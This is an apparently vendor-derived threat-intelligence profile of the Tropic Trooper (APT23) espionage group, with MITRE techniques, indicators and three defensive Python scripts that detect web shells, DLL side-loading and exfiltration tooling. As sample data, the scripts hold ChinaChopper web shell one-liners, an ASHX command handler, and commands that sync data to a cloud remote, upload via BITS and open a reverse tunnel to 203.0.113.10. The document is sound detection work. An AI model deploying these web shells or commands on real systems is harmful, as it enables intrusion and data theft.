Keypoints
- Active since 2011, Tropic Trooper (aka Pirate Panda / APT23) conducts long-running espionage campaigns focused on East and Southeast Asia.
- Initial access is frequently achieved through tailored spear-phishing attachments and by exploiting public-facing servers, notably Exchange and other web apps.
- The group uses custom and off-the-shelf tools (ChinaChopper, ShadowPad, PoisonIvy, Quasar RAT, Crowdoor) for persistence and remote control.
- They employ DLL side-loading, web shells, obfuscation/encryption, and autostart mechanisms to evade detection and maintain long-term access.
- Tropic Trooper escalates privileges using DLL hijacking and other exploits, then moves laterally via SMB/admin shares, proxies, and tunneling tools.
- Data exfiltration is staged and stealthy, using cloud sync tools (RClone), BITS jobs, and encrypted channels to extract high-value intelligence.
- Defensive recommendations include enhanced email security, MFA and privileged account management, network segmentation, EDR, patching, and CTI-informed incident response.
MITRE Techniques
- [T1190] Exploit Public-Facing Application – Used to gain initial access by targeting vulnerable servers (e.g., Exchange); (‘Exploit public-facing application’)
- [T1566.001] Spearphishing Attachment – Spear-phishing emails with malicious Office/PDF attachments are leveraged for initial compromise; (‘Spear Phishing Attachment’)
- [T1059.001] Command and Scripting Interpreter: PowerShell – PowerShell is used to execute payloads and scripts during compromise and post-exploitation; (‘Command and Scripting Interpreter: PowerShell’)
- [T1059.003] Command and Scripting Interpreter: Windows Command Shell – Windows shell commands are executed to run tools and manipulate the host; (‘Command and Scripting Interpreter: Windows Command Shell’)
- [T1569.002] System Services: Service Execution – Services are used to execute malicious components as part of persistence and execution; (‘System Services: Service Execution’)
- [T1543.003] Create or Modify System Process: Windows Service – Windows services are created or modified to maintain persistence; (‘Create or Modify System Process: Windows Service’)
- [T1574.002] Hijack Execution Flow: DLL Side-Loading – Malicious DLLs (e.g., datast.dll, VERSION.dll) are placed where a trusted executable's search order finds them first, so the host process loads the backdoor loader instead of the legitimate library; (‘Hijack Execution Flow: DLL Side-Loading’)
- [T1505.003] Server Software Component: Web Shell – Web shells (e.g., ChinaChopper, Umbraco web modules) are deployed to retain access on compromised servers; (‘Server Software Component: Web Shell’)
- [T1140] Deobfuscate/Decode Files or Information – Attackers use deobfuscation and decryption routines to decode next-stage payloads; (‘Deobfuscate/Decode Files or Information’)
- [T1070.001] Indicator Removal: Clear Windows Event Logs – Event logs are cleared to remove forensic traces of activity; (‘Indicator Removal: Clear Windows Event Logs’)
- [T1027.002] Obfuscated Files or Information: Software Packing – Malware payloads are packed or obfuscated to evade signature detection; (‘Obfuscated Files or Information: Software Packing’)
- [T1218.011] System Binary Proxy Execution: Rundll32 – Signed, legitimate binaries (e.g., rundll32.exe) are used to proxy execution of malicious DLL code; (‘System Binary Proxy Execution: Rundll32’)
- [T1036.005] Masquerading: Match Legitimate Name or Location – Malicious files and modules are named or placed to resemble legitimate software components; (‘Masquerading: Match Legitimate Name or Location’)
- [T1003.001] OS Credential Dumping: LSASS Memory – Credential dumping from LSASS memory is used to harvest account credentials; (‘OS Credential Dumping: LSASS Memory’)
- [T1552.002] Unsecured Credentials: Credentials in Registry – Credentials stored in the registry are harvested for lateral movement and privilege escalation; (‘Unsecured Credentials: Credentials in Registry’)
- [T1021.002] Remote Services: SMB/Windows Admin Shares – SMB and admin share access is used for lateral movement across systems; (‘Remote Services: SMB/Windows Admin Shares’)
- [T1087.002] Account Discovery: Domain Account – Discovery of domain accounts supports target identification and escalation; (‘Account Discovery: Domain Account’)
- [T1482] Domain Trust Discovery – Domain trust relationships are enumerated to plan broader network access; (‘Domain Trust Discovery’)
- [T1083] File and Directory Discovery – Files and directories are searched to locate valuable data and credentials; (‘File and Directory Discovery’)
- [T1005] Data from Local System – Sensitive files are collected from local systems for exfiltration; (‘Data from Local System’)
- [T1071.001] Application Layer Protocol: Web Protocols – Web-based protocols are used for command-and-control traffic and data transfer; (‘Application Layer Protocol: Web Protocols’)
- [T1095] Non-Application Layer Protocol – Non-application layer channels are used for C2 in some operations; (‘Non-Application Layer Protocol’)
- [T1090.001] Proxy: Internal Proxy – Internal proxying (e.g., SOCKS5 via neo-reGeorg) is used to pivot and hide traffic; (‘Proxy: Internal Proxy’)
- [T1567.002] Exfiltration to Cloud Storage – Tools like RClone are used to sync stolen data to cloud storage for exfiltration; (‘Exfiltration to Cloud Storage’)
- [T1020] Automated Exfiltration – Automated methods are used to move collected data out of the environment stealthily; (‘Automated Exfiltration’)
- [T1547.001] Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder – Autostart registry keys and startup mechanisms are used to re-launch malware on reboot; (‘Boot or Logon Autostart Execution: Registry Run Keys / Startup Folder’)
- [T1203] Exploitation for Client Execution – Exploits (e.g., in Office documents) trigger client-side code execution to deliver payloads; (‘Exploitation for Client Execution’)
- [T1564.001] Hide Artifacts: Hidden Files and Directories – Hidden files and directories are used to conceal tools and exfiltration staging; (‘Hide Artifacts: Hidden Files and Directories’)
- [T1518.001] Software Discovery: Security Software Discovery – Installed software, including security products, is enumerated to identify defenses to evade and applications to exploit; (‘Software Discovery: Security Software Discovery’)
- [T1082] System Information Discovery – System information is collected to inform the attackers’ next steps; (‘System Information Discovery’)
- [T1016] System Network Configuration Discovery – Network configuration details are discovered to map the environment; (‘System Network Configuration Discovery’)
- [T1049] System Network Connections Discovery – Active network connections are enumerated to understand communication paths; (‘System Network Connections Discovery’)
- [T1033] System Owner/User Discovery – User and owner metadata are collected to prioritize targets and accounts; (‘System Owner/User Discovery’)
- [T1204.002] User Execution: Malicious File – User interaction with malicious files is a common vector for execution via spear-phishing; (‘User Execution: Malicious File’)
- [T1078.003] Valid Accounts: Local Accounts – Compromised local accounts are used to maintain access and move laterally; (‘Valid Accounts: Local Accounts’)
Indicators of Compromise
- [File names] Malicious DLLs and loaders observed in intrusions – datast.dll, VERSION.dll (used in DLL search-order hijacking to load backdoors)
- [Web shells] Server-based persistent access – ChinaChopper, Umbraco web modules (used to place files and maintain control on compromised web servers)
- [Malware / Tool names] Remote access and exfiltration tools linked to activity – Crowdoor (backdoor delivering Cobalt Strike), Quasar RAT, ShadowPad, PoisonIvy (used for persistence, remote control, and data theft)
- [Exfiltration tools] Cloud and transfer utilities used to remove data – RClone, BITSAdmin (used to sync or transfer stolen files), and other data-transfer tools
- [Vulnerability reference] Exploited CVE/event context – CVE-2023-26360 (an Adobe ColdFusion improper access control flaw exploited in the wild) is cited as the server vulnerability used for entry; the web shells dropped afterwards were obfuscated with the BypassGodzilla tool
Rewritten Article
Tropic Trooper, which security researchers also refer to as Pirate Panda or APT23, is a Chinese state-linked espionage group that has operated since at least 2011. The group targets sensitive organizations—most notably government bodies, healthcare institutions, transportation, and defense-related networks—primarily across Taiwan, Hong Kong, the Philippines, and wider parts of Southeast Asia. Over time their campaigns expanded geographically and tactically, reflecting priorities that align with Chinese geopolitical interests.
The group’s intrusion playbook centers on carefully crafted spear-phishing messages and the exploitation of vulnerable public-facing applications. Attackers frequently send convincing emails with malicious Microsoft Office documents or PDFs, or they lure victims to compromised web pages hosting exploit kits. They also take advantage of vulnerable servers, such as Exchange, and implant web shells to gain an initial foothold. These initial steps let Tropic Trooper deliver and execute payloads that establish long-term presence in targeted networks.
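The web shell foothold described above is something a defender can hunt for on the server itself. The following is an added example, not code from the original profile or from any vendor report: a static scan of web content directories for the ChinaChopper one-liner shapes in ASPX and PHP, plus generic command-execution and request-to-eval patterns. The rule set, the extension list and the sample files are my own constructions; the Umbraco modules named in the IOC list are compiled .NET assemblies and a source-text scan like this would not catch them.

```python
"""
Static hunt for web shells dropped on a compromised web server.
Added example; the ChinaChopper one-liner shapes are public knowledge,
the remaining rules and the sample files are constructed for illustration.
"""
import os
import re
import tempfile

WEB_EXTS = {".aspx", ".ashx", ".asmx", ".php", ".jsp"}

# (rule name, extensions the rule applies to, pattern)
RULES = [
    ("chinachopper_aspx", {".aspx", ".ashx"},
     re.compile(r'eval\s*\(\s*Request\.Item\[[^\]]+\]\s*,\s*"unsafe"', re.I)),
    ("chinachopper_php", {".php"},
     re.compile(r"@?eval\s*\(\s*\$_(POST|REQUEST|GET)\[", re.I)),
    ("aspx_process_start", {".aspx", ".ashx", ".asmx"},
     re.compile(r"Process(StartInfo)?\s*\(|Process\.Start\s*\(|cmd\.exe", re.I)),
    ("php_command_exec", {".php"},
     re.compile(r"\b(shell_exec|passthru|system|popen|proc_open)\s*\(", re.I)),
    ("request_to_eval_generic", WEB_EXTS,
     re.compile(r"eval\s*\([^)]*(Request|\$_(POST|GET|REQUEST)|getParameter)", re.I)),
]


def classify(content, ext):
    """Return the names of the rules that fire for one file's source text."""
    ext = ext.lower()
    return [name for name, exts, rx in RULES if ext in exts and rx.search(content)]


def scan_tree(root):
    """Walk a web root and return {relative path: [rule names]} for suspicious files."""
    findings = {}
    for dirpath, _, files in os.walk(root):
        for fn in files:
            ext = os.path.splitext(fn)[1].lower()
            if ext not in WEB_EXTS:        # only server-executable content is interesting
                continue
            path = os.path.join(dirpath, fn)
            with open(path, "r", encoding="utf-8", errors="ignore") as fh:
                hits = classify(fh.read(), ext)
            if hits:
                findings[os.path.relpath(path, root).replace(os.sep, "/")] = hits
    return findings


# Constructed sample web root: one clean page, two ChinaChopper drops,
# one hand-written command handler, and a decoy with a non-executable extension.
SAMPLE_FILES = {
    "default.aspx": '<%@ Page Language="C#" %><html><body>Hello</body></html>',
    "aspnet_client/x.aspx": '<%@ Page Language="Jscript"%><%eval(Request.Item["pass"],"unsafe");%>',
    "uploads/img.php": "<?php @eval($_POST['cmd']); ?>",
    "api/run.ashx": '<%@ WebHandler Language="C#" Class="H" %> ... '
                    'System.Diagnostics.Process.Start("cmd.exe", "/c " + ctx.Request["q"]);',
    "readme.txt": 'eval(Request.Item["x"],"unsafe")',   # wrong extension: never executed, ignored
}


def demo():
    """Materialise the sample files in a temp dir and scan them."""
    with tempfile.TemporaryDirectory() as root:
        for rel, text in SAMPLE_FILES.items():
            path = os.path.join(root, rel)
            os.makedirs(os.path.dirname(path), exist_ok=True)
            with open(path, "w", encoding="utf-8") as fh:
                fh.write(text)
        return scan_tree(root)


if __name__ == "__main__":
    for path, hits in sorted(demo().items()):
        print(f"{path}: {', '.join(hits)}")
```

Run it against a copy of the web root taken during triage and pair the hits with file creation times and with child processes of w3wp.exe; a compiled or heavily obfuscated shell shows up only in the latter.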
After breaching a target, Tropic Trooper focuses on persistence using a mix of custom and off-the-shelf malware. Tools observed include the lightweight ChinaChopper web shell, the custom Crowdoor backdoor, and remote access trojans such as Quasar RAT, ShadowPad, and PoisonIvy. Payload encryption, obfuscation, and periodic tool rotation blunt signature-based detection, while Windows services, autostart registry entries, and encrypted loaders that decrypt the next stage in memory keep the implants running across reboots and cleanup attempts.
Privilege escalation and defense evasion are typical next steps. Tropic Trooper drops malicious libraries under the names of legitimate DLLs (examples include datast.dll and VERSION.dll) beside a trusted executable so that the Windows loader picks them up ahead of the real library; the hijacked DLL then decrypts and runs further stages under the host process's identity and privileges. Combined with DLL injection and exploitation of unpatched components, this gives the operators administrative control, which in turn lets them disable defenses and move freely within the environment.
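A hunt for the side-loading shape described above, as an added example that is not part of the original profile: it evaluates Sysmon-style image-load records (Event ID 7) and flags a Windows DLL name loaded from outside the system directories, the datast.dll name from the IOC list, and a signed host process loading an unsigned DLL from its own folder. The `ImageLoad` structure, its `proc_signed` field and the sample events are my own constructions, and the DLL names beyond VERSION.dll are common side-load targets I have assumed rather than names from the page.

```python
"""
Hunt for DLL side-loading in Sysmon-style image-load (Event ID 7) records.
Added example; the event records below are constructed for illustration.
"""
import ntpath
from dataclasses import dataclass

# Directories from which Windows' own DLLs are legitimately loaded.
SYSTEM_DIRS = ("c:\\windows\\system32\\", "c:\\windows\\syswow64\\",
               "c:\\windows\\winsxs\\")

# Windows DLL names that side-loaders impersonate. VERSION.dll is from the
# page's IOC list; the others are assumed, commonly abused names.
SYSTEM_DLLS = {"version.dll", "userenv.dll", "dbghelp.dll", "wtsapi32.dll"}

# Names from the page's IOC list with no legitimate Windows counterpart.
KNOWN_BAD_DLLS = {"datast.dll"}


@dataclass
class ImageLoad:
    image: str          # loading process ("Image" in Sysmon EID 7)
    image_loaded: str   # DLL path ("ImageLoaded")
    signed: bool        # "Signed" field for the DLL
    proc_signed: bool   # assumed field: signature status of the loading process


def evaluate(ev):
    """Return the reasons an event looks like side-loading (empty list = benign)."""
    dll_path = ev.image_loaded.lower()
    dll_name = ntpath.basename(dll_path)
    dll_dir = ntpath.dirname(dll_path) + "\\"
    proc_dir = ntpath.dirname(ev.image.lower()) + "\\"
    in_system = dll_dir.startswith(SYSTEM_DIRS)

    reasons = []
    if dll_name in SYSTEM_DLLS and not in_system:
        # The search order found a same-named DLL before reaching System32.
        reasons.append(f"system DLL {dll_name} loaded from {dll_dir}")
    if dll_name in KNOWN_BAD_DLLS:
        reasons.append(f"known side-loaded DLL name {dll_name}")
    if ev.proc_signed and not ev.signed and dll_dir == proc_dir and not in_system:
        # The classic shape: trusted signed host EXE, unsigned DLL in its own folder.
        reasons.append("signed process loaded unsigned DLL from its own directory")
    return reasons


def hunt(events):
    """Return (process, dll, reasons) for every event that triggers at least one rule."""
    hits = []
    for ev in events:
        reasons = evaluate(ev)
        if reasons:
            hits.append((ev.image, ev.image_loaded, reasons))
    return hits


# Constructed telemetry: a benign system load, a benign application DLL, and
# two side-load shapes mirroring the DLL names from the IOC list.
SAMPLE_EVENTS = [
    ImageLoad(r"C:\Windows\System32\svchost.exe",
              r"C:\Windows\System32\version.dll", True, True),
    ImageLoad(r"C:\Program Files\Vendor\app.exe",
              r"C:\Program Files\Vendor\helper.dll", True, True),
    ImageLoad(r"C:\ProgramData\Sync\svc.exe",
              r"C:\ProgramData\Sync\VERSION.dll", False, True),
    ImageLoad(r"C:\Users\Public\Libraries\update.exe",
              r"C:\Users\Public\Libraries\datast.dll", False, True),
]

if __name__ == "__main__":
    for image, dll, reasons in hunt(SAMPLE_EVENTS):
        print(f"{image} -> {dll}")
        for r in reasons:
            print(f"    {r}")
```

The third rule is the one that survives renaming: an actor can pick any DLL name, but the combination of a signed host binary, an unsigned library, and both sitting in a user-writable directory is the structural signature of the technique.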
Lateral movement follows escalation. The operators map network topology, discover domain accounts and trust relationships, and harvest credentials from locations such as LSASS memory and the registry. Tools like neo-reGeorg (a SOCKS5 tunnel served through a web shell), FRPC (the fast reverse proxy client), and Chisel are leveraged to pivot between segmented networks and forward traffic around security controls. They also use SMB and Windows admin shares to spread to additional hosts and to create multiple access points in the environment.
The ultimate objective is data collection and exfiltration. Once high-value assets and directories are identified, Tropic Trooper compresses, encrypts, and stages data for stealthy removal. They have used RClone to sync data to cloud storage, employed BITS jobs and other covert channels to transfer files, and scripted automated exfiltration to minimize detection. The group prioritizes information that supports long-term intelligence goals, including governmental documents, healthcare records, research data, and military-related materials.
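The tunneling tools in the lateral-movement paragraph and the exfiltration tooling described above both leave process-creation telemetry that can be matched directly. The following is an added example, not code from the original profile: a small rule set over Sysmon-style process-creation records (Event ID 1) that keys on the PE OriginalFileName so a renamed rclone or chisel still matches, and flags rclone copying to a named remote, chisel reverse-SOCKS tunnels, FRPC, BITS upload jobs, hidden staging directories, and tools spawned by a web server process. The rule names, the regular expressions and the sample events are my own constructions.

```python
"""
Match tunneling and exfiltration tooling in Sysmon-style process-creation
(Event ID 1) records. Added example; tool names come from the page, the rules
and the sample events are constructed here for illustration.
"""
import ntpath
import re
from dataclasses import dataclass


@dataclass
class ProcessCreate:
    image: str               # "Image": path of the new process
    command_line: str        # "CommandLine"
    original_file_name: str  # "OriginalFileName" from the PE version resource
    parent_image: str        # "ParentImage"


# The PE version resource usually survives a rename on disk, so key on it.
TOOL_BY_ORIGINAL_NAME = {"rclone.exe": "rclone", "chisel.exe": "chisel", "frpc.exe": "frpc"}
WEB_SERVER_PARENTS = {"w3wp.exe", "httpd.exe"}        # typical web shell parents

RCLONE_VERBS = re.compile(r"\b(copy|sync|move|copyto|moveto)\b", re.I)
RCLONE_REMOTE = re.compile(r"\s[A-Za-z][\w-]+:")      # "gdrive:" but not a drive letter "C:"
CHISEL_REVERSE = re.compile(r"\bclient\b.*\bR:")        # chisel reverse tunnel, e.g. R:1080:socks
BITS_UPLOAD = re.compile(r"/transfer\b.*/upload\b", re.I)
HIDE_DIR = re.compile(r"\battrib\b.*\+h", re.I)


def rules(ev):
    """Return the names of every rule the event matches (empty = nothing to see)."""
    hits = []
    exe = ntpath.basename(ev.image).lower()
    orig = ev.original_file_name.lower()
    parent = ntpath.basename(ev.parent_image).lower()
    cmd = ev.command_line
    tool = TOOL_BY_ORIGINAL_NAME.get(orig)

    if tool and orig != exe:
        hits.append(f"{tool}_renamed_binary")           # masquerading, T1036.005
    if tool == "rclone" and RCLONE_VERBS.search(cmd) and RCLONE_REMOTE.search(cmd):
        hits.append("rclone_to_remote")                 # exfiltration to cloud, T1567.002
    if tool == "chisel" and CHISEL_REVERSE.search(cmd):
        hits.append("chisel_reverse_tunnel")            # internal proxy, T1090.001
    if tool == "frpc":
        hits.append("frpc_started")
    if exe == "bitsadmin.exe" and BITS_UPLOAD.search(cmd):
        hits.append("bitsadmin_upload")                 # BITS job moving data out
    if exe == "cmd.exe" and HIDE_DIR.search(cmd):
        hits.append("hidden_directory_created")         # hidden staging, T1564.001
    if parent in WEB_SERVER_PARENTS and exe not in {"conhost.exe", "csc.exe"}:
        hits.append("spawned_by_web_server")            # web shell child process
    return hits


def triage(events):
    """Return {command_line: [rules]} for every event that matched at least one rule."""
    result = {}
    for ev in events:
        hits = rules(ev)
        if hits:
            result[ev.command_line] = hits
    return result


SAMPLE_EVENTS = [  # constructed telemetry
    ProcessCreate(r"C:\Users\Public\svchost.exe",
                  r"svchost.exe sync C:\Staging\ gdrive:backup/q3 --config C:\Users\Public\r.conf -q",
                  "rclone.exe", r"C:\Windows\System32\cmd.exe"),
    ProcessCreate(r"C:\Windows\System32\bitsadmin.exe",
                  r"bitsadmin /transfer upd /upload /priority high https://203.0.113.10/u/a.zip C:\Staging\a.zip",
                  "bitsadmin.exe", r"C:\Windows\System32\cmd.exe"),
    ProcessCreate(r"C:\ProgramData\net\chisel.exe",
                  r"chisel.exe client https://203.0.113.10:443 R:1080:socks",
                  "chisel.exe", r"C:\Windows\System32\inetsrv\w3wp.exe"),
    ProcessCreate(r"C:\Windows\System32\cmd.exe",
                  r'cmd.exe /c attrib +h +s "C:\Staging"',
                  "Cmd.Exe", r"C:\Windows\explorer.exe"),
    ProcessCreate(r"C:\ProgramData\net\frpc.exe",
                  r"frpc.exe -c C:\ProgramData\net\frpc.ini",
                  "frpc.exe", r"C:\Windows\System32\cmd.exe"),
    ProcessCreate(r"C:\Program Files\Vendor\app.exe",
                  r'"C:\Program Files\Vendor\app.exe" --update',
                  "app.exe", r"C:\Windows\explorer.exe"),
]

if __name__ == "__main__":
    for cmd, hits in triage(SAMPLE_EVENTS).items():
        print(f"{', '.join(hits):45s} {cmd}")
```

The first sample is the case that defeats file-name allow-lists: rclone renamed to svchost.exe in a user-writable path still carries `rclone.exe` in its version resource, and the `sync ... gdrive:` command line confirms the intent.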
Between 2021 and 2024 the group evolved both its targets and technical approaches. Reports from multiple vendors document an expansion into transportation, governmental agencies outside East Asia, and even human rights organizations in geopolitically sensitive regions. Technically, Tropic Trooper has incorporated more advanced red-team-like techniques, refined custom decryption routines, and adopted DLL side-loading and proxying methods to better evade defenders. In 2024 researchers noted the use of a Crowdoor backdoor variant to deliver Cobalt Strike, alongside improved usage of legacy tools like Quasar RAT with custom unpacking and loading methods.
Defending against Tropic Trooper requires a layered strategy that addresses both the initial vectors and the techniques used for persistence and exfiltration. Email defenses and phishing-resistant MFA (FIDO2 security keys rather than push or SMS codes) reduce the success of targeted attachments and stolen-credential reuse. Limiting privileges, using privileged account management, and applying strict network segmentation reduce the impact of successful compromises. Endpoint detection and response (EDR) systems help detect anomalous behavior and custom malware, while regular patch management and timely remediation of known server vulnerabilities (for example, Exchange and ColdFusion issues) eliminate common entry points. Continuous network monitoring, IDS/IPS, and a tested incident response plan informed by up-to-date cyber threat intelligence are also critical to detect and contain intrusions early.
In short, Tropic Trooper remains a persistent, adaptable espionage actor that combines targeted social engineering with custom and publicly available tooling to conduct long-term intelligence collection. Organizations in the group’s target sectors should adopt proactive defenses, maintain robust detection capabilities, and keep threat intelligence current to mitigate the risk posed by this actor.
Read more: https://socradar.io/dark-web-profile-tropic-trooper-apt23/